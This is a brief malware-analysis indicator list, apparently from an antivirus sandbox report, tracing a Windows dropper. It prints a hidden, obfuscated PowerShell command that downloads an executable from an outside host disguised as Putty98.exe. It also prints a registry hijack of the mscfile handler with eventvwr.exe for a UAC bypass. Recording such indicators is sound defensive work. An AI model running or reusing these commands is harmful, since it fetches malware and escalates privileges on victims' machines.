Техническая информация
- https://a.sinister.ly/mxnqjw.exe как %temp%\\putty98.exe
- '<SYSTEM32>\cmd.exe' /c poWErsHELL.EXe -WiNdoWstyLE hiddeN -noPRofiLE -EXeCUTionPOliCY byPASs (NEW-ObJeCT SYStEM.Net.WebCliEnt).DowNLOadFiLe('https://a.sinister.ly/mxnqjw.exe','%TEMP%\\Putty98.exe') & reg add HKCU\...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- nul
- DNS ASK a.###ister.ly
- '<SYSTEM32>\reg.exe' add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d %TEMP%\\Putty98.exe /f
- '<SYSTEM32>\eventvwr.exe'
- '<SYSTEM32>\mmc.exe' "<SYSTEM32>\eventvwr.msc" (со скрытым окном)
- '<SYSTEM32>\ping.exe' -n 15 127.0.0.1
- '<SYSTEM32>\cmd.exe' /c poWErsHELL.EXe -WiNdoWstyLE hiddeN -noPRofiLE -EXeCUTionPOliCY byPASs (NEW-ObJeCT SYStEM.Net.WebCliEnt).DowNLOadFiLe('https://a.sinister.ly/mxnqjw.exe','%TEMP%\\Putty98.exe') & reg add HKCU\... (со скрытым окном)